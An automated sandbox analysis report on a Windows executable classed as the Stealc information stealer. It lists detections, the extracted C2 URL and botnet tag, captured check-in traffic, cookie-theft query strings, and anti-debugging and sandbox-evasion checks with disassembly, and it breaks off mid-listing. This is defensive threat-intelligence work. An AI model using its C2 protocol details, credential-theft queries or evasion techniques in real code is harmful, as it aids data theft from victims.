Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1530693
MD5: 6a6d66291698792c3e6764ec5dd4e0ff
SHA1: dd9d3a54a2016c6b6e049f43fca9fcccedc89493
SHA256: 0daf657523ba709f5c99af228de6b06699c6ddba2bfc4be766baae3027740602
Tags: exe, user-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6552 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6A6D66291698792C3E6764EC5DD4E0FF)
  • cleanup
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1743679514.0000000005160000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6552 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6552 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.790000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-10T12:05:09.806519+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.790000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe | Virustotal: Detection: 54%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_0079C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00797240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00797240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00799AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00799AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00799B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00799B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_007A8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_007A38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007A4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0079DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0079E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_007A4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0079ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0079BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0079DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_007916D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0079F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_007A3EA0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGI | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 33 45 38 30 35 35 32 44 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 2d 2d 0d 0a | Data Ascii: ------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="hwid"443E80552D561166170430------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="build"doma------AAFBAKECAEGCBFIEGDGI--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00794880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00794880
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGI | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 33 45 38 30 35 35 32 44 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 2d 2d 0d 0a | Data Ascii: ------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="hwid"443E80552D561166170430------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="build"doma------AAFBAKECAEGCBFIEGDGI--
Source: file.exe, 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/9
Source: file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php(
Source: file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpT
Source: file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B58A98 0_2_00B58A98
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B53A80 0_2_00B53A80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B19255 0_2_00B19255
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5DC27 0_2_00B5DC27
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B5A59C 0_2_00B5A59C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C78D90 0_2_00C78D90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ADADCF 0_2_00ADADCF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B55515 0_2_00B55515
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4BD01 0_2_00A4BD01
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A6DEA5 0_2_00A6DEA5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A77E8A 0_2_00A77E8A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B50605 0_2_00B50605
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 007945C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: vppxldjh ZLIB complexity 0.9950000704463481
Source: file.exe, 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1743679514.0000000005160000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_007A9600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_007A3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SJREOFCX.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookiesS;
Source: file.exe | Virustotal: Detection: 54%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1860096 > 1048576
Source: file.exe | Static PE information: Raw size of vppxldjh is bigger than: 0x100000 < 0x19fe00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.790000.0.unpack :EW;.rsrc :W;.idata :W; :EW;vppxldjh:EW;xcnejhbt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;vppxldjh:EW;xcnejhbt:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_007A9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cdf9b should be: 0x1ce021
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: vppxldjh
Source: file.exe | Static PE information: section name: xcnejhbt
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B7F093 push edx; mov dword ptr [esp], eax 0_2_00B7F0C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C180E8 push eax; mov dword ptr [esp], ecx 0_2_00C18129
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C180E8 push edx; mov dword ptr [esp], edi 0_2_00C1812D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C180E8 push ebx; mov dword ptr [esp], 65BF9E3Fh 0_2_00C18163
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C180E8 push 69FFA08Ah; mov dword ptr [esp], ecx 0_2_00C1816F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C180E8 push 53B8B847h; mov dword ptr [esp], ecx 0_2_00C18192
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C180E8 push 668C1000h; mov dword ptr [esp], eax 0_2_00C181F4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFE890 push esi; mov dword ptr [esp], eax 0_2_00BFE8A7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007AB035 push ecx; ret 0_2_007AB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AB58CC push ecx; mov dword ptr [esp], 481B31B3h 0_2_00AB58F4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0F8B0 push eax; mov dword ptr [esp], ebp 0_2_00C0F8F5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7A8D8 push esi; mov dword ptr [esp], eax 0_2_00A7A92E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7A8D8 push edx; mov dword ptr [esp], edi 0_2_00A7A968
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7A8D8 push 65822EBEh; mov dword ptr [esp], ebx 0_2_00A7A972
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7A8D8 push esi; mov dword ptr [esp], edx 0_2_00A7A97F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2300A push 6B1B397Fh; mov dword ptr [esp], edi 0_2_00C2303F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2300A push eax; mov dword ptr [esp], 42BBDBEAh 0_2_00C23073
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3A00E push ebx; mov dword ptr [esp], eax 0_2_00C3A5BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C089DF push 37AF756Fh; mov dword ptr [esp], edx 0_2_00C08A28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C101E4 push esi; mov dword ptr [esp], ebx 0_2_00C10244
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B8A193 push 1D8B1A4Ch; mov dword ptr [esp], edi 0_2_00B8A19B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAD1EB push ecx; mov dword ptr [esp], edi 0_2_00BAD216
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAD1EB push esi; mov dword ptr [esp], 452172C5h 0_2_00BAD304
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAD1EB push 018C3A8Ch; mov dword ptr [esp], ebx 0_2_00BAD369
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C481A1 push 482089ADh; mov dword ptr [esp], esi 0_2_00C481C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C481A1 push edx; mov dword ptr [esp], ebp 0_2_00C4820F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7D9B0 push edx; mov dword ptr [esp], ecx 0_2_00C7D9D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C7D14F push edx; mov dword ptr [esp], eax 0_2_00C7D1A5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C11122 push edx; mov dword ptr [esp], edi 0_2_00C111A7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B94946 push esi; mov dword ptr [esp], edi 0_2_00B94A55
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B94946 push edi; mov dword ptr [esp], ebp 0_2_00B94A7C
Source: file.exe | Static PE information: section name: vppxldjh entropy: 7.954340444718931

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_007A9860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13354
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B61DDA second address: B61DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B62068 second address: B620C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D9853h 0x00000009 jmp 00007FB9B11D984Eh 0x0000000e popad 0x0000000f jmp 00007FB9B11D984Fh 0x00000014 jmp 00007FB9B11D9850h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB9B11D9852h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B62243 second address: B6227F instructions: 0x00000000 rdtsc 0x00000002 je 00007FB9B1005716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FB9B1005734h 0x00000010 jc 00007FB9B1005722h 0x00000016 js 00007FB9B1005716h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6241A second address: B6241F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6241F second address: B62425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B625DC second address: B625E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B64DD8 second address: B64DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B64DDE second address: B64DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B64EA7 second address: B64EF9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB9B1005727h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 jmp 00007FB9B100571Fh 0x00000018 pushad 0x00000019 jne 00007FB9B1005716h 0x0000001f je 00007FB9B1005716h 0x00000025 popad 0x00000026 popad 0x00000027 mov eax, dword ptr [eax] 0x00000029 pushad 0x0000002a push edi 0x0000002b jno 00007FB9B1005716h 0x00000031 pop edi 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B64EF9 second address: B64EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B64EFD second address: B64F1A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FB9B100571Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B64F1A second address: B64FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FB9B11D9848h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D3707h], edi 0x00000027 push 00000003h 0x00000029 mov esi, dword ptr [ebp+122D3A0Dh] 0x0000002f push 00000000h 0x00000031 movsx edx, di 0x00000034 push 00000003h 0x00000036 jl 00007FB9B11D984Ch 0x0000003c or edx, 60CFB078h 0x00000042 call 00007FB9B11D9849h 0x00000047 jmp 00007FB9B11D9859h 0x0000004c push eax 0x0000004d jl 00007FB9B11D9864h 0x00000053 mov eax, dword ptr [esp+04h] 0x00000057 push esi 0x00000058 pushad 0x00000059 push eax 0x0000005a pop eax 0x0000005b jmp 00007FB9B11D984Dh 0x00000060 popad 0x00000061 pop esi 0x00000062 mov 